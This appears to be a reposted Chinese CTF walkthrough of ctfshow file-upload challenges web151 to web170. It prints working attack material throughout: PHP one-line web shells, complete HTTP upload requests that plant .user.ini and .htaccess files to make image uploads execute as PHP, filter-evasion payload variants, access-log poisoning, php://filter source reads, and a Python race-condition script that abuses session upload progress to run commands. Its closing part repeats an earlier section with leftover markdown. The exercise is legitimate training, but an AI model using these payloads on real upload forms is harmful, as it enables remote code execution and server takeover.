admin 管理员组文章数量: 1184232
文件上传
web151
题目描述
新的起点,加油!
解题思路
查看源码得知
<div class="layui-row">
<div class="layui-col-md12">
<button type="button" class="layui-btn" id="upload" lay-data="{url: 'upload.php', accept: 'images',exts:'png'}">
<i class="layui-icon"></i>上传图片
</button>
</div>
要上传png,用txt写一个一句话木马,
<?php @eval($_POST["123"]);?>
把后缀改为png,使用burp上传,拦截之后把png改为php,然后显示上传成功,使用蚁剑连接,翻找的flag.php
ctfshow{84946f9f-1021-4ad4-aa54-edf546a1b06e}
web152
题目描述
后端不能单一校验
解题思路
和上一道题解题步骤一模一样,没什么好说的
ctfshow{c296b64a-4f04-4102-b85f-1eaa582a9d75}
web153
题目描述
后端不能单一校验
解题思路
尝试和之前一样,发现文件上传失败,失败原因:文件类型不合规,说明存在waf防御,首先想到上传.htaccess文件但服务器是nginx搭建的,所以没用,但是可以上传.user.ini文件。
.user.ini 文件类似于PHP的php.ini文件,他们都可以称为是PHP的配置文件。user.ini.它比 .htaccess 用的更广,不管是 nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。
不过还允许上传 .ini 文件
POST /upload.php HTTP/1.1
Host: 3277805e-6a76-4072-99ae-2237a90eb8fb.challenge.ctf.show
Content-Length: 206
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv0k4Ho2WfgKjvEM4
Origin: http://71e8908e-4639-4593-9a50-f90d7587eb7e.challenge.ctf.show
Referer: http://71e8908e-4639-4593-9a50-f90d7587eb7e.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryv0k4Ho2WfgKjvEM4
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png
auto_prepend_file=123.png
------WebKitFormBoundaryv0k4Ho2WfgKjvEM4--
再上传被包含的文件
POST /upload.php HTTP/1.1
Host: 3277805e-6a76-4072-99ae-2237a90eb8fb.challenge.ctf.show
Content-Length: 204
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv0k4Ho2WfgKjvEM4
Origin: http://71e8908e-4639-4593-9a50-f90d7587eb7e.challenge.ctf.show
Referer: http://71e8908e-4639-4593-9a50-f90d7587eb7e.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryv0k4Ho2WfgKjvEM4
Content-Disposition: form-data; name="file"; filename="123.png"
Content-Type: image/png
<?php eval($_POST[123]);?>
------WebKitFormBoundaryv0k4Ho2WfgKjvEM4--
现在使用蚁剑连接,url是http://3277805e-6a76-4072-99ae-2237a90eb8fb.challenge.ctf.show/upload/
找到flag
ctfshow{600782c9-66b1-40b0-8ac3-a168dc394205}
web154
题目描述
后端不能单二校验
解题思路
这次还加入了对文件内容的检测,如果文件内容包含 php 就不给上传,改用 <?= 代替 <?php 从而绕过检测。还是和之前一样,先上传.ini
POST /upload.php HTTP/1.1
Host: f11ee8dd-6db9-45bd-871a-077f9dc3f25f.challenge.ctf.show
Content-Length: 215
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybEiRWfZt73j05UYD
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Origin: http://f11ee8dd-6db9-45bd-871a-077f9dc3f25f.challenge.ctf.show
Referer: http://f11ee8dd-6db9-45bd-871a-077f9dc3f25f.challenge.ctf.show/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundarybEiRWfZt73j05UYD
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png
auto_prepend_file=1.png
------WebKitFormBoundarybEiRWfZt73j05UYD--
POST /upload.php HTTP/1.1
Host: f11ee8dd-6db9-45bd-871a-077f9dc3f25f.challenge.ctf.show
Content-Length: 215
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybEiRWfZt73j05UYD
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Origin: http://f11ee8dd-6db9-45bd-871a-077f9dc3f25f.challenge.ctf.show
Referer: http://f11ee8dd-6db9-45bd-871a-077f9dc3f25f.challenge.ctf.show/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundarybEiRWfZt73j05UYD
Content-Disposition: form-data; name="file"; filename="1.png"
Content-Type: image/png
<?=eval($_POST[1]);
------WebKitFormBoundarybEiRWfZt73j05UYD--
之后连接成功,找到flag
ctfshow{51be4ea6-e6f2-40af-abed-bc3e92ba2133}
web155
题目描述
后端不能单三校验
解题思路
和上一道题一样
POST /upload.php HTTP/1.1
Host: 249c3f82-462a-4ea3-a501-7b90ba9c0954.challenge.ctf.show
Content-Length: 209
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2mrn6xE4hVODEgEF
Origin: https://249c3f82-462a-4ea3-a501-7b90ba9c0954.challenge.ctf.show
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://249c3f82-462a-4ea3-a501-7b90ba9c0954.challenge.ctf.show/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
------WebKitFormBoundary2mrn6xE4hVODEgEF
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png
auto_prepend_file=1.png
------WebKitFormBoundary2mrn6xE4hVODEgEF--
POST /upload.php HTTP/1.1
Host: 249c3f82-462a-4ea3-a501-7b90ba9c0954.challenge.ctf.show
Content-Length: 209
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2mrn6xE4hVODEgEF
Origin: https://249c3f82-462a-4ea3-a501-7b90ba9c0954.challenge.ctf.show
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://249c3f82-462a-4ea3-a501-7b90ba9c0954.challenge.ctf.show/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
------WebKitFormBoundary2mrn6xE4hVODEgEF
Content-Disposition: form-data; name="file"; filename="1.png"
Content-Type: image/png
<?=eval($_POST[1]);
------WebKitFormBoundary2mrn6xE4hVODEgEF--
蚁剑连接得到flag
ctfshow{119dfdba-c52c-4112-9e50-e323322bb545}
web156
题目描述
后端不能单四校验
解题思路
按照上一道题的思路,但提示文件类型不合规,经过测试发现过滤了[],用{}代替
修改1.png的内容为
<?=eval($_POST{1});
即可连接成功,找到flag
ctfshow{6d82075f-9de4-4493-b3e2-35654a4dc1cb}
web157
题目描述
后端不能单五校验
解题思路
这道题又过滤了{},感觉一句话木马不好写了,直接把png里面的内容改为php恶意代码,前面的流程不变
<? system('tac ../f*') ?>
访问url+/upload/得到flag
ctfshow{99a7d4f9-9f4d-44cd-96f5-b260f66bfd77}
web158
题目描述
后端不能单六校验
解题思路
和上一道题一样的上传
ctfshow{800c2cf9-a9b4-479f-8f3d-09416b36ed9b}
web159
题目描述
师傅们可以的
解题思路
再次过滤了()``log以及;采用include进行日志包含,修改传入的png里面的内容
<?include '/var/lo'.'g/nginx/access.l'.'og'?>
也可以采用之前命令执行的办法
<?=`tac ../f*`?>
ctfshow{ebf02e41-db90-4aa8-a88d-5988546c8194}
web160
题目描述
师傅们可以的
解题思路
过滤了 (空格)利用php伪协议读取源码
<?=include"ph"."p://filter/convert.base64-encode/resource=../flag.p"."hp"?>
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0yMSAyMTozMToyMw0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMTAtMTYgMjI6NDE6NDANCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxhZz0iY3Rmc2hvd3s5OWFiN2M3MC0yOWU2LTRkODAtODg5Ni1jZWI2NGJkN2IyODN9Ijs=
解码得到
ctfshow{99ab7c70-29e6-4d80-8896-ceb64bd7b283}
web161
题目描述
狮虎们轻点,嘤嘤嘤
解题思路
上传.user.ini文件发现显示文件类型错误,加了一个gif头就上传成功了GIF89a,之后上传png的时候还是保留gif头
<?=include"ph"."p://filter/convert.base64-encode/resource=../flag.p"."hp"?>
base64解码之后得到flag
ctfshow{c5c6e0eb-013b-4ae6-a400-f0d8c273d7f4}
web162
题目描述
姿势挺多的啊?啊?
解题思路
过滤了.
参考wpctfshow web入门 文件上传web162–web167 - 技术栈
大佬的脚本
import requests
import threading
import re
session = requests.session()
sess = 'hhh' #之前上传时自拟的名字
url1 = "http://12d363d9-266c-4a6d-bb94-1a2ce754c8f7.challenge.ctf.show/"
url2 = "http://12d363d9-266c-4a6d-bb94-1a2ce754c8f7.challenge.ctf.show/upload"
data1 = {
'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("tac ../f*");?>'
}
file = {
'file': 'yu22x tql' #文件名,随便改就行
}
cookies = {
'PHPSESSID': sess
}
def write(): #上传文件竞争过程
while True:
r = session.post(url1, data=data1, files=file, cookies=cookies)
def read():
while True: #每次竞争完都访问一下url/uoload看有没有flag
r = session.get(url2)
if 'flag' in r.text:
flag=repile('ctfshow{.+}') #我在做题的时候flag格式已经改成ctfshow{}了
print(flag.findall(r.text))
threads = [threading.Thread(target=write),
threading.Thread(target=read)]
for t in threads:
t.start()
先上传配置文件为
GIF89a
auto_append_file=/tmp/sess_hhh
运行脚本得到flag
ctfshow{de15f48a-986e-47cf-b9a5-5a0e19c0cbfe}
web163
题目描述
玉石俱焚
解题思路
修改上一道题的脚本参数得到flag
web164,165
二次渲染,没复现出来
web166
题目描述
刻骨铭心
解题思路
查看源码得到
<div class="layui-row">
<div class="layui-col-md12">
<button type="button" class="layui-btn" id="upload" lay-data="{url: 'upload.php', accept: 'images',exts:'zip'}">
<i class="layui-icon"></i>上传文件
</button>
</div>
</div>
要上传zip,随便压缩一个zip用记事本编辑在最后添加一句话木马,然后上传,发现可以下载,感觉这是包含点,开启抓包,点击下载,先放入repeater区,发送一次,再改请求方法和post的参数得到flag
web167
题目描述
httpd
解题思路
这里只能传jpg了
<div class="layui-row">
<div class="layui-col-md12">
<button type="button" class="layui-btn" id="upload" lay-data="{url: 'upload.php', accept: 'images',exts:'jpg'}">
<i class="layui-icon"></i>上传文件
</button>
</div>
</div>
上传配置文件.htaccess,直接上传不了,要么随便上传一个jpg图片burp抓包改文件名和内容,要么上传.htaccess.jpg之后brup抓包删掉后缀
<FilesMatch ".jpg">
SetHandler application/x-httpd-php
</FilesMatch>
然后上传一个jpg的一句话木马,蚁剑连接,找到flag
ctfshow{8e7ad1c3-b732-462a-a5da-ba8f5885ae20}
web168
题目描述
基础免杀
解题思路
还是只能上传png,但是发现绕过前端验证之后可以burp修改为php,先尝试直接
<?=`tac ../flag.php`?>
失败修改文件内容为
<?=`ls ../`?>
找到flagaa.php,再次读取
ctfshow{717b2b45-a28b-4dab-b19e-2a9f8ef3bd69}
web169
题目描述
高级免杀
解题思路
通过上传发现<? php等都被过滤了,所以只能考虑文件包含,这题可以用日志包含来做
服务器是nignx,上传.user.ini来进行日志包含
进行包含时要注意在上传文件的目录中需要有index.php文件,因为没有index.php文件,所以先上传一个index.php文件,里面随便写就可以了(我写的123)
POST /upload.php HTTP/1.1
Host: de9ad5f8-4af4-4a41-9a9e-b39e4d09abbe.challenge.ctf.show
Content-Length: 185
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYzBNokwJpeBhBOQo
Origin: https://de9ad5f8-4af4-4a41-9a9e-b39e4d09abbe.challenge.ctf.show
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://de9ad5f8-4af4-4a41-9a9e-b39e4d09abbe.challenge.ctf.show/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
------WebKitFormBoundaryYzBNokwJpeBhBOQo
Content-Disposition: form-data; name="file"; filename="index.php"
Content-Type: image/png
123
------WebKitFormBoundaryYzBNokwJpeBhBOQo--
再传入.user.ini
auto_append_file=/var/log/nginx/access.log
访问上传的文件位置,在user-agent写入一句话木马,post传入先传入1=system(“ls ../”); ``1=system(“tac ../flagaa.php”); 执行得到flag,但是很奇怪,169日志没写进去,但是170写进去了
web170
题目描述
终极免杀
解题思路
和169一样
ttps://de9ad5f8-4af4-4a41-9a9e-b39e4d09abbe.challenge.ctf.show/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
------WebKitFormBoundaryYzBNokwJpeBhBOQo
Content-Disposition: form-data; name=“file”; filename=“index.php”
Content-Type: image/png
123
------WebKitFormBoundaryYzBNokwJpeBhBOQo–
再传入`.user.ini`
auto_append_file=/var/log/nginx/access.log
访问上传的文件位置,在user-agent写入一句话木马,post传入先传入`1=system(“ls ../”); ``1=system(“tac ../flagaa.php”); `执行得到flag,但是很奇怪,169日志没写进去,但是170写进去了
## web170
### 题目描述
终极免杀
### 解题思路
和169一样
> ctfshow{9452fea1-a9c1-4c56-9b0a-d2fa3477dd18}
版权声明:本文标题:ctfshow文件上传 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.roclinux.cn/b/1759886072a3134816.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论